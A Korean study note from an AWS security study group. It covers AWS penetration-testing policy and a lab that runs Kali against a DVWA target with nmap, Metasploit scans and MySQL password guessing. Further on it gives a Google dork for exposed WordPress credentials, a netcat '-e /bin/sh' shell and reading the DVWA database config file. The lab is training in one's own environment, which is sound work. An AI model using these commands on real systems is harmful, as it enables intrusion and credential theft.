AHSS-Last study [AWS Hacking & Security Study 1기 Study]

*cloudNet@ 팀의 가시다 님이 진행하는 AWS Hacking & Security Study 스터디 입니다.

AWS 침투 테스트

  • 침투 테스트용 AWS 고객 지원 정책링크
    • AWS 고객은 다음 섹션의 “허용 서비스”에 나열된 서비스에 대해 사전 승인 없이 AWS 인프라에 대한 보안 평가 또는 침투 테스트를 수행할 수 있습니다. 또한, AWS는 고객이 AWS IP 공간 내의 보안 평가 도구나, AWS 또는 계약한 타사 온프레미스 클라우드 공급자의 보안 평가 도구를 호스팅하여 테스트를 수행하는 것을 허가합니다. 명령 및 제어(C2)를 포함하는 모든 보안 테스트사전 승인이 필요합니다.
    • 이러한 활동이 아래 명시된 정책에 부합하는지 확인하세요. 참고: 고객은 AWS 인프라 또는 AWS 서비스 자체의 보안 평가를 수행할 수 없습니다. 보안 평가 중 AWS 서비스 내에서 보안 문제를 발견하면 **AWS 보안 팀에 즉시 문의**하세요.
    • AWS는 보안 테스트와 관련된 활동에 대한 악용 사례 보고서를 받을 경우 이를 고객에게 전달합니다. 응답 시 타사 신고자와 공유할 수 있는 연락처를 포함하여 승인된 언어로 사용 사례를 자세히 설명하여 제공하세요. **여기**에서 자세히 알아보세요.
    • AWS 서비스의 리셀러고객의 보안 테스트 활동에 대한 의무가 있습니다.

허용 정책

  • Amazon EC2 인스턴스, WAF, NAT 게이트웨이, Elastic Load Balancer
  • Amazon RDS
  • Amazon CloudFront
  • Amazon Aurora
  • Amazon API Gateway
  • AWS AppSync
  • AWS Lambda 및 Lambda Edge 함수
  • Amazon Lightsail 리소스
  • Amazon Elastic Beanstalk 환경
  • Amazon Elastic Container Service
  • AWS Fargate
  • Amazon Elasticsearch
  • Amazon FSx
  • AWS Transit Gateway
  • S3 호스팅된 애플리케이션(S3 버킷을 대상으로 설정하는 것은 엄격히 금지됩니다)

금지 활동

  • Amazon Route 53 Hosted Zones를 통한 DNS zone walking
  • Route 53를 통하여 DNS 하이재킹
  • Route 53를 통하여 DNS 파밍
  • 서비스 거부(DoS), 분산 서비스 거부(DDoS), 시뮬레이트 DoS, 시뮬레이트 DDoS(**DDoS 시뮬레이션 테스트 정책**에 따라 다름)포트 플러딩
  • 프로토콜 플러딩
  • 요청 플러딩(로그인 요청 플러딩, API 요청 플러딩)

이용 약관 : 보안 테스트

  • 서비스, 네트워크 대역폭, 분당 요청 및 인스턴스 유형으로 제한됩니다.
  • 이 서비스 사용은 사용자와 AWS와의 **Amazon Web Services 고객 계약**에 따릅니다.
  • 보안 평가 도구 및 서비스(다음 섹션에 포함)의 사용에 관한 AWS의 정책을 준수합니다.

→ AWS의 도구 또는 서비스의 직접적인 결과인 취약점 또는 기타 문제점에 대한 발견은 테스트 완료 후 24시간 이내에 **AWS 보안 팀**으로 전달되어야 합니다.

https://www.notion.so/surho/5-1ca39a8ed36643fdabeff6a42a6c2bab?pvs=4#3473c99a857c46b68d9434ff38841026

AWS Penetration Testing

https://github.com/PacktPublishing/AWS-Penetration-Testing

실습 환경 : awspt 스택 이름 배포, SgIngressSshCidr의 값에 ‘자신의 집 IP/32’ 입력

*awspt 파일 다운 경로: https://blog.naver.com/sjmtomm (해당 링크 들어간 후 명령어 카테고리에 있음)

#
sudo amazon-linux-extras install mate-desktop1.x -y
sudo yum update
sudo reboot
sudo passwd ec2-user
...

#
sudo yum install tigervnc-server -y
vncpasswd

Kali Linux 소개 및 배포 : (과거 BackTrack) 모의 해킹 도구가 패키지 형태로 포함된 데비안 기반 리눅스 – 링크 , 다양한 환경 지원 – 링크 기본계정

  • AMI 마켓플레이스 선택 후 실행 : t3.medium(vCPU2 Mem4), VPC(My-VPC), 퍼블릭IP, Subnet(My-Public-SN), SG(MySG2 포함된것 선택), gp3(30) ⇒ 구독 확인 완료 까지 5분 정도 소요됨
#!/bin/bash
apt update
apt install metasploit-framework -y
  • 배포 후 접속 확인
# 
ssh -i <ssh key file> kali@IP

# 기본 정보 확인
hostnamectl
==
Static hostname: kali
       Icon name: computer-vm
         Chassis: vm 🖴
      Machine ID: ec2cb5f4eb7b2393627ce953ee208247
         Boot ID: b764e74681e140fc8bb6418053764d36
  Virtualization: amazon
Operating System: Kali GNU/Linux Rolling
          Kernel: Linux 6.3.0-kali1-cloud-amd64
    Architecture: x86-64
 Hardware Vendor: Amazon EC2
  Hardware Model: t3.medium
Firmware Version: 1.0
   Firmware Date: Mon 2017-10-16
    Firmware Age: 5y 11month 1w 2d
==

# 관리자 전환 : 취약점 툴 대부분 관리자 수준의 권한을 요구
sudo su
whoami
==
root
==

# ping 테스트 (DVWA한테)
ping -c 2 10.0.0.10
==
64 bytes from 10.0.0.10: icmp_seq=1 ttl=255 time=0.677 ms
64 bytes from 10.0.0.10: icmp_seq=2 ttl=255 time=0.284 ms
==

# aws cli 설치 확인 
aws --version
==
aws-cli/2.12.0 Python/3.11.4 Linux/6.3.0-kali1-cloud-amd64 source/x86_64.kali.2023 prompt/off
==
  • (옵션) Kali에 xrdp 설치 및 활성화 후 rdp로 접속 해볼 것 → 취약점 툴 확인 및 tor 브라우저 사용, 각종 web proxy 툴 사용 편리+

https://www.kali.org/tools/

https://www.kali.org/docs/cloud/aws/

탐색 결과 대상은 절대로 직접 접속이나 공격 시도를 하지 마시기 바랍니다!

  • Web archives : 웹 정보 캐시 아카이브 – 링크 ← 인터넷 아카이브 사이트 (구글 저장된 페이지 즉 해당 시간대 나온 화면 출력 )
  • 사진 정보 – 링크 한글 ←이미지에 대한 정보 보는곳
  • 구글 활용
inurl:/wp-content/uploads/ ext:txt "username" AND "password" | "pwd" | "pw"
  • 웹 상의 취약한 서버 등 정보 Shodan – 링크

ㄴ해당 대상의 취약점 cv list 출력된다

  • NMAP
# The -sV switch enumerates the version of the service. 
# The -sC switch is for using scripts in conjunction with your scan.
nmap -sV -sC -p 22 10.0.0.10
==
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 15:18 UTC
Nmap scan report for ip-10-0-0-10.ap-northeast-2.compute.internal (10.0.0.10)
Host is up (0.00013s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 32:21:a7:9c:1d: (RSA)
|   256 ea:25:0 (ECDSA)
|_  256 f0:63:40 (ED25519)
MAC Address: 02:10:9 (Unknown)
==

nmap -sV -sC -p 80 10.0.0.10
==
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 15:28 UTC
Nmap scan report for ip-10-0-0-10.ap-northeast-2.compute.internal (10.0.0.10)
Host is up (0.00060s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.57 (() PHP/8.2.9)
| http-title: Login :: Damn Vulnerable Web Application (DVWA)
|_Requested resource was login.php
|_http-server-header: Apache/2.4.57 () PHP/8.2.9
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 02:10: (Unknown)
==

nmap -sV -sC -p 3306 10.0.0.10
==
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 15:29 UTC
Nmap scan report for ip-10-0-0-10.ap-northeast-2.compute.internal (10.0.0.10)
Host is up (0.000086s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MariaDB (unauthorized)
MAC Address: 02:10 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
==
# Exploring Metasploit 설치 되어 있음
#apt update && apt install metasploit-framework -y
msfdb -h
==
Manage the metasploit framework database

You can use an specific port number for the
PostgreSQL connection setting the PGPORT variable
in the current shell.

Example: PGPORT=5433 msfdb init

  msfdb init     # start and initialize the database
  msfdb reinit   # delete and reinitialize the database
  msfdb delete   # delete database and stop using it
  msfdb start    # start the database
  msfdb stop     # stop the database
  msfdb status   # check service status
  msfdb run      # start the database and run msfconsole
==

msfdb run
-----------------------------------
search rdp
search wordpress
search fortinet

search TCP portscan
==
Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                   normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/portscan/xmas                        normal  No     TCP "XMas" Port Scanner
   2  auxiliary/scanner/portscan/ack                         normal  No     TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/tcp                         normal  No     TCP Port Scanner
   4  auxiliary/scanner/portscan/syn                         normal  No     TCP SYN Port Scanner
==

use auxiliary/scanner/portscan/tcp
options
==
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds


View the full module info with the info, or info -d command.
==

#타켓 호스트 지정 
set RHOSTS 10.0.0.10
options
==
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds


View the full module info with the info, or info -d command.
==
#실행
run
==
[+] 10.0.0.10:            - 10.0.0.10:22 - TCP OPEN
[+] 10.0.0.10:            - 10.0.0.10:80 - TCP OPEN
[+] 10.0.0.10:            - 10.0.0.10:111 - TCP OPEN
[+] 10.0.0.10:            - 10.0.0.10:3306 - TCP OPEN
[*] 10.0.0.10:            - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
==

# RDP scanning
use auxiliary/scanner/rdp/rdp_scanner
options

exit
-----------------------------------
  • whois
apt install whois -y
whois packpub.com
  • DB
#
nmap -p 3306 -Pn -sV 10.0.0.10

# 암호 파일 생성
# kali 돌아옴 (exit)
echo "aws" >> mypw.txt
echo "admin" >> mypw.txt
echo "qwe123" >> mypw.txt
cat mypw.txt

#
msfdb run
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.0.0.10
set USERNAME dvwa
set STOP_ON_SUCCESS true
Set PASS_FILE mypw.txt
run
==
[-] 10.0.0.10:3306        - 10.0.0.10:3306 - Unsupported target version of MySQL detected. Skipping.
[*] 10.0.0.10:3306        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
==

...
use auxiliary/scanner/mysql/mysql_version
options
set rhosts 10.0.0.10

# CVE 검색 : NMAP NSE - 링크
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
#nmap 도구를 사용하여 특정 IP 주소(여기서는 10.0.0.10)의 특정 포트(여기서는 3306)에 대한 서비스 버전 감지(-sV 옵션), 그리고 vulcan 스크립트(vulcan.nse) 실행을 요청
nmap -sV --script=vulscan/vulscan.nse -p 3306 10.0.0.10
==
#취약점 보여줌
SecurityFocus - https://www.securityfocus.com/bid/:
| [96162] MariaDB and MySQL CVE-2017-3302 Denial of Service Vulnerability
| [85985] MariaDB and MySQL CVE-2015-5969 Local Information Disclosure Vulnerability
| [81810] MariaDB/MySQL/Percona Server CVE-2016-2047 SSL Certificate Validation Security Bypass Vulnerability
| [65757] MariaDB Prior to 5.5.35 Remote Multiple Denial of Service Vulnerabilities

==
  • Reverse Shell : netcat , lambda

DVWA 10.0.0.10

#yum install nc -y
nc -lvp 4444 -e /bin/sh

Kali 10.0.0.20

nc 10.0.0.10 4444
pwd
ip a
id
ls /var/www/html/config
cat /var/www/html/config/config.inc.php

Exploring AWS Metasploit modules

msf6 > search aws

Matching Modules
================

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/unix/webapp/awstatstotals_multisort                    2008-08-26       excellent  Yes    AWStats Totals multisort Remote Command Execution
   1   exploit/unix/webapp/awstats_configdir_exec                     2005-01-15       excellent  Yes    AWStats configdir Remote Command Execution
   2   exploit/unix/webapp/awstats_migrate_exec                       2006-05-04       excellent  Yes    AWStats migrate Remote Command Execution
   3   exploit/linux/misc/accellion_fta_mpipe2                        2011-02-07       excellent  No     Accellion FTA MPIPE2 Command Execution
   4   exploit/multi/browser/adobe_flash_hacking_team_uaf             2015-07-06       great      No     Adobe Flash Player ByteArray Use After Free
   5   exploit/multi/browser/adobe_flash_nellymoser_bof               2015-06-23       great      No     Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
   6   auxiliary/cloud/aws/enum_ssm                                                    normal     No     Amazon Web Services EC2 SSM enumeration
   7   auxiliary/cloud/aws/enum_ec2                                                    normal     No     Amazon Web Services EC2 instance enumeration
   8   auxiliary/cloud/aws/enum_iam                                                    normal     No     Amazon Web Services IAM credential enumeration
   9   auxiliary/cloud/aws/enum_s3                                                     normal     No     Amazon Web Services S3 instance enumeration
   10  exploit/windows/rdp/cve_2019_0708_bluekeep_rce                 2019-05-14       manual     Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   11  exploit/linux/http/cisco_prime_inf_rce                         2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution
   12  exploit/linux/http/cisco_ucs_rce                               2019-08-21       excellent  Yes    Cisco UCS Director Unauthenticated Remote Code Execution
   13  payload/generic/shell_bind_aws_ssm                                              normal     No     Command Shell, Bind SSM (via AWS API)
   14  post/multi/escalate/aws_create_iam_user                                         normal     No     Create an AWS IAM User
   15  post/windows/manage/dell_memory_protect                                         manual     No     Dell DBUtilDrv2.sys Memory Protection Modifier
   16  exploit/windows/local/cve_2021_21551_dbutil_memmove            2021-05-04       good       Yes    Dell DBUtil_2_3.sys IOCTL memmove
   17  exploit/linux/local/docker_runc_escape                         2019-01-01       manual     No     Docker Container Escape Via runC Overwrite
   18  exploit/linux/smtp/exim_gethostbyname_bof                      2015-01-27       great      Yes    Exim GHOST (glibc gethostbyname) Buffer Overflow
   19  post/multi/gather/aws_ec2_instance_metadata                                     normal     No     Gather AWS EC2 Instance Metadata
   20  exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce  2016-03-28       excellent  Yes    HID discoveryd command_blink_on Unauthenticated RCE
   21  exploit/hpux/lpd/cleanup_exec                                  2002-08-28       excellent  No     HP-UX LPD Command Execution
   22  exploit/multi/misc/jboss_remoting_unified_invoker_rce          2019-12-11       excellent  Yes    JBOSS EAP/AS Remoting Unified Invoker RCE
   23  auxiliary/admin/aws/aws_launch_instances                                        normal     No     Launches Hosts in AWS
   24  exploit/windows/browser/ms13_055_canchor                       2013-07-09       normal     No     MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
   25  exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc     2016-09-23       excellent  Yes    MagniComp SysInfo mcsiwrapper Privilege Escalation
   26  exploit/linux/upnp/miniupnpd_soap_bof                          2013-03-27       normal     Yes    MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution
   27  auxiliary/dos/upnp/miniupnpd_dos                               2013-03-27       normal     No     MiniUPnPd 1.4 Denial of Service (DoS) Exploit
   28  exploit/openbsd/local/dynamic_loader_chpass_privesc            2019-12-11       excellent  Yes    OpenBSD Dynamic Loader chpass Privilege Escalation
   29  exploit/unix/webapp/pajax_remote_exec                          2006-03-30       excellent  No     PAJAX Remote Command Execution
   30  exploit/multi/upnp/libupnp_ssdp_overflow                       2013-01-29       normal     No     Portable UPnP SDK unique_service_name() Remote Code Execution
   31  post/hardware/rftransceiver/transmitter                                         normal     No     RF Transceiver Transmitter
   32  exploit/linux/http/realtek_miniigd_upnp_exec_noauth            2015-04-24       normal     Yes    Realtek SDK Miniigd UPnP SOAP Command Execution
   33  exploit/linux/http/piranha_passwd_exec                         2000-04-04       excellent  No     RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
   34  exploit/multi/http/rocket_servergraph_file_requestor_rce       2013-10-30       great      Yes    Rocket Servergraph Admin Center fileRequestor Remote Code Execution
   35  auxiliary/scanner/smtp/smtp_relay                                               normal     No     SMTP Open Relay Detection
   36  exploit/multi/http/sflog_upload_exec                           2012-07-06       excellent  Yes    Sflog! CMS 1.0 Arbitrary File Upload Vulnerability
   37  exploit/windows/browser/java_basicservice_impl                 2010-10-12       excellent  No     Sun Java Web Start BasicServiceImpl Code Execution
   38  exploit/windows/antivirus/symantec_endpoint_manager_rce        2014-02-24       excellent  Yes    Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution
   39  exploit/linux/http/terramaster_unauth_rce_cve_2021_45837       2021-12-24       excellent  Yes    TerraMaster TOS 4.2.15 or lower - RCE chain from unauthenticated to root via session crafting.
   40  post/multi/gather/aws_keys                                                      normal     No     UNIX Gather AWS Keys
   41  payload/cmd/unix/bind_aws_instance_connect                                      normal     No     Unix SSH Shell, Bind Instance Connect (via AWS API)
   42  post/windows/gather/credentials/purevpn_cred_collector                          normal     No     Windows Gather PureVPN Client Credential Collector
   43  auxiliary/scanner/http/yaws_traversal                          2011-11-25       normal     No     Yaws Web Server Directory Traversal
   44  exploit/unix/webapp/phpbb_highlight                            2004-11-12       excellent  No     phpBB viewtopic.php Arbitrary Code Execution

자원삭제

Kali 삭제 → CloudFormation 삭제

위로 스크롤